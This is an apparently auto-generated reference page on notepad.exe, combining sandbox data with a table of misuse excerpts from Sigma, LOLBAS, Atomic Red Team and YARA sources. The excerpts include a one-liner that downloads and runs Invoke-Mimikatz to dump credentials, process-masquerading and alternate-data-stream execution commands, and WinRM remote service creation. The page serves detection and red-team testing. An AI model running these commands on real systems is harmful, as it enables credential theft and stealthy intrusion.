notepad.exe
- File Path: C:\Users\user\AppData\Local\Microsoft\WindowsApps\notepad.exe
- Description: --help - Notepad (Window Title)
Hashes
Type | Hash
---|---
MD5 |
SHA1 |
SHA256 |
SHA384 |
SHA512 |
SSDEEP |
Runtime Data
Window Title: --help - Notepad
Open Handles:
Path | Type |
---|---|
(R-D) C:\Windows\Fonts\StaticCache.dat | File |
(RW-) C:\Windows\System32 | File |
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_9d947278b86cc467 | File |
\BaseNamedObjects\__ComCatalogCache__ | Section |
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db | Section |
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db | Section |
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro | Section |
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 | Section |
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 | Section |
\Sessions\2\BaseNamedObjects\windows_shell_global_counters | Section |
\Sessions\2\Windows\Theme1077709572 | Section |
\Windows\Theme3461253685 | Section |
Loaded Modules:
Path |
---|
C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_10.2103.12.0_x64__8wekyb3d8bbwe\Notepad\Notepad.exe |
C:\WINDOWS\System32\KERNEL32.DLL |
C:\WINDOWS\System32\KERNELBASE.dll |
C:\WINDOWS\SYSTEM32\ntdll.dll |
Signature
- Status: Signature verified.
- Serial: 33000003F16206E3E7EFDA8ABE0000000003F1
- Thumbprint: 5362FAEB842C236D05A729B7FAC85BAA1B68BDCA
- Issuer: CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
- Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
File Metadata
- Original Filename:
- Product Name:
- Company Name:
- File Version:
- Product Version:
- Language:
- Legal Copyright:
File Scan
- VirusTotal Detections: Unknown
File Similarity (ssdeep match)
Possible Misuse
The following table contains possible examples of notepad.exe being misused. While notepad.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.
Source | Source File | Example | License |
---|---|---|---|
sigma | image_load_susp_image_load.yml | - '\notepad.exe' | DRL 1.0 |
sigma | net_connection_win_notepad_network_connection.yml | title: Notepad Making Network Connection | DRL 1.0 |
sigma | net_connection_win_notepad_network_connection.yml | description: Detects suspicious network connection by Notepad | DRL 1.0 |
sigma | net_connection_win_notepad_network_connection.yml | - https://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/ | DRL 1.0 |
sigma | net_connection_win_notepad_network_connection.yml | Image\|endswith: '\notepad.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_gup.yml | description: Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks | DRL 1.0 |
sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Local\Notepad++\updater\GUP.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_gup.yml | - '\Users\\*\AppData\Roaming\Notepad++\updater\GUP.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_gup.yml | - '\Program Files\Notepad++\updater\GUP.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_gup.yml | - '\Program Files (x86)\Notepad++\updater\GUP.exe' | DRL 1.0 |
sigma | proc_creation_win_susp_gup.yml | - Execution of tools named GUP.exe and located in folders different than Notepad++\updater | DRL 1.0 |
LOLBAS | Gpup.yml | Description: Execute another command through gpup.exe (Notepad++ binary). | |
LOLBAS | Gpup.yml | - 'C:\Program Files (x86)\Notepad++\updater\gpup.exe ' | |
LOLBAS | Explorer.yml | - Command: explorer.exe C:\Windows\System32\notepad.exe | |
LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | |
LOLBAS | Forfiles.yml | Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. | |
LOLBAS | Forfiles.yml | - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | |
LOLBAS | Forfiles.yml | Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. | |
LOLBAS | pester.yml | - Command: Pester.bat [/help\|?\|-?\|/?] "$null; notepad" | |
LOLBAS | pester.yml | Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad | |
LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' | |
LOLBAS | Winrm.yml | - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' | |
LOLBAS | Cdb.yml | - Command: cdb.exe -cf x64_calc.wds -o notepad.exe | |
LOLBAS | Dxcap.yml | - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe | |
LOLBAS | Dxcap.yml | Description: Launch notepad as a subprocess of Dxcap.exe | |
atomic-red-team | index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | windows-index.md | - Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows] | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | - Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | ## Atomic Test #3 - Masquerading - cscript.exe running as notepad.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | Copies cscript.exe, renames it, and launches it to masquerade as an instance of notepad.exe. | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | Upon successful execution, cscript.exe is renamed as notepad.exe and executed from a non-standard path. | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | cmd.exe /c %APPDATA%\notepad.exe /B | MIT License. © 2018 Red Canary |
atomic-red-team | T1036.003.md | del /Q /F %APPDATA%\notepad.exe >nul 2>&1 | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | When the test completes, a new process will be started locally. A notepad application will be started when input is left on default. | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | \| process_to_execute \| Name or path of process to execute. \| String \| notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1047.md | You should expect to see notepad.exe running after execution of this test. | MIT License. © 2018 Red Canary |
atomic-red-team | T1048.003.md | Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
atomic-red-team | T1048.003.md | \| input_file \| Path to file to be exfiltrated. \| Path \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1048.003.md | Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. | MIT License. © 2018 Red Canary |
atomic-red-team | T1048.003.md | \| input_file \| Path to file to exfiltrate \| Path \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within | MIT License. © 2018 Red Canary |
atomic-red-team | T1053.005.md | Create a scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.001.md | With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.001.md | \| process_id \| PID of input_arguments \| Integer \| (Start-Process notepad -PassThru).id\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.012.md | \| sponsor_binary_path \| Path of the sponsor binary (executable that will host the binary) \| String \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.012.md | \| spawnto_process_name \| Name of the process to spawn \| String \| notepad\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1055.012.md | This module executes notepad.exe from within the WINWORD.EXE process | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.001.md | Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. | MIT License. © 2018 Red Canary |
atomic-red-team | T1059.001.md | $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',(String).Split('}')[0].Split('=')[5]),@('StatusBar',0))\|ForEach{SP $reg (Item Variable:).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS\|?{(Item Variable:).Value.id-ieq$curpid}\|ForEach{(Variable ).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')\|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')\|ForEach{$wshell.SendKeys((Item Variable:).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')\|ForEach{$wshell.SendKeys((Variable ).Value)};If(GPS\|?{(Item Variable:).Value.id-ieq$curpid}){@('{TAB}','~')\|ForEach{$wshell.SendKeys((Item Variable:).Value)} };@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')\|ForEach{SP $reg (Item Variable:).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr | MIT License. © 2018 Red Canary |
atomic-red-team | T1105.md | Upon successful execution the test will open calculator and Notepad executable for 10 seconds. | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | Spawns a notepad.exe process as a child of the current process. | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. | MIT License. © 2018 Red Canary |
atomic-red-team | T1134.004.md | \| parent_name \| Parent process to spoof from \| Path \| $Env:windir\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" | MIT License. © 2018 Red Canary |
atomic-red-team | T1197.md | \| command_path \| Path of command to execute \| Path \| C:\Windows\system32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | forfiles /p c:\windows\system32 /m notepad.exe /c #{process} | MIT License. © 2018 Red Canary |
atomic-red-team | T1202.md | \| process \| Process to execute \| String \| notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.004.md | Copy-Item -Path "$([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())InstallUtil.exe" -Destination "$Env:windir\System32\Tasks\notepad.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.004.md | InstallUtilPath = "$Env:windir\System32\Tasks\notepad.exe" | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.004.md | Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.007.md | Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when successfully executed. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.007.md | Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when successfully executed. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. | MIT License. © 2018 Red Canary |
atomic-red-team | T1218.011.md | \| exe_to_launch \| Path of the executable to launch \| Path \| %windir%\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.001.md | Change Default File Association From cmd.exe of hta to notepad. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.001.md | Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.001.md | \| target_extension_handler \| txtfile maps to notepad.exe \| Path \| txtfile\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.003.md | After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.003.md | CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.010.md | AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.012.md | <blockquote>Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application's IFEO will be prepended to the application's name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe ). (Citation: Microsoft Dev Blog IFEO Mar 2010) | MIT License. © 2018 Red Canary |
atomic-red-team | T1546.012.md | \| target_binary \| Binary To Attach To \| Path \| C:\Windows\System32\notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1547.002.md | After a reboot, Notepad.exe will be executed as child process of lsass.exe. | MIT License. © 2018 Red Canary |
atomic-red-team | T1548.002.md | Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe | MIT License. © 2018 Red Canary |
atomic-red-team | T1548.002.md | \| command.to.execute \| Command to execute \| String \| cmd.exe /c notepad.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.004.md | folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" | MIT License. © 2018 Red Canary |
atomic-red-team | T1564.004.md | in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.002.md | - Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.002.md | ## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.002.md | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.002.md | \| gup_executable \| GUP is an open source signed binary used by Notepad++ for software updates \| Path \| PathToAtomicsFolder\T1574.002\bin\GUP.exe\| | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.012.md | Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.012.md | the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.012.md | level of Event Viewer bypassing UAC and executing notepad.exe with high integrity. If the account used is not a local administrator the profiler DLL will | MIT License. © 2018 Red Canary |
atomic-red-team | T1574.012.md | still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity. | MIT License. © 2018 Red Canary |
signature-base | apt_bluetermite_emdivi.yar | $s4 = "\NOTEPAD.EXE" fullword ascii | CC BY-NC 4.0 |
signature-base | apt_molerats_jul17.yar | $s2 = "Notepad++.exe" fullword wide | CC BY-NC 4.0 |
signature-base | apt_olympic_destroyer.yar | $s3 = "\system32\notepad.exe" fullword wide | CC BY-NC 4.0 |
signature-base | apt_poisonivy.yar | $s0 = "\notepad.exe" fullword ascii /* score: '11.025' */ | CC BY-NC 4.0 |
signature-base | apt_ta17_293A.yar | $au2 = "/notepad.png" | CC BY-NC 4.0 |
signature-base | apt_wildneutron.yar | $n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\notepad.exe > %s & del /f %s" fullword ascii /* PEStudio Blacklist: strings / / score: '46.00' */ | CC BY-NC 4.0 |
signature-base | apt_woolengoldfish.yar | $s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword | CC BY-NC 4.0 |
signature-base | crime_ransom_ragna_locker.yar | $s2 = "\notepad.exe" fullword wide /* Show ransom note to the victim*/ | CC BY-NC 4.0 |
signature-base | gen_cn_hacktools.yar | $s14 = "NOTEPAD.EXE result.txt" fullword ascii | CC BY-NC 4.0 |
signature-base | gen_powershell_empire.yar | $s2 = "$proc = Start-Process -WindowStyle Hidden notepad.exe -PassThru" fullword ascii | CC BY-NC 4.0 |
signature-base | thor_inverse_matches.yar | description = "Abnormal notepad.exe - typical strings not found in file" | CC BY-NC 4.0 |
signature-base | thor_inverse_matches.yar | $winxp = "Software\Microsoft\Notepad" wide | CC BY-NC 4.0 |
signature-base | thor_inverse_matches.yar | $winxp_de = "Software\Microsoft\Notepad" wide | CC BY-NC 4.0 |
signature-base | thor_inverse_matches.yar | filename == "notepad.exe" | CC BY-NC 4.0 |
stockpile | 3796a00b-b11d-4731-b4ca-275a07d83299.yml | Start-Process Notepad.exe -NoNewWindow -PassThru -Credential $credential; | Apache-2.0 |
MIT License. Copyright (c) 2020-2021 Strontic.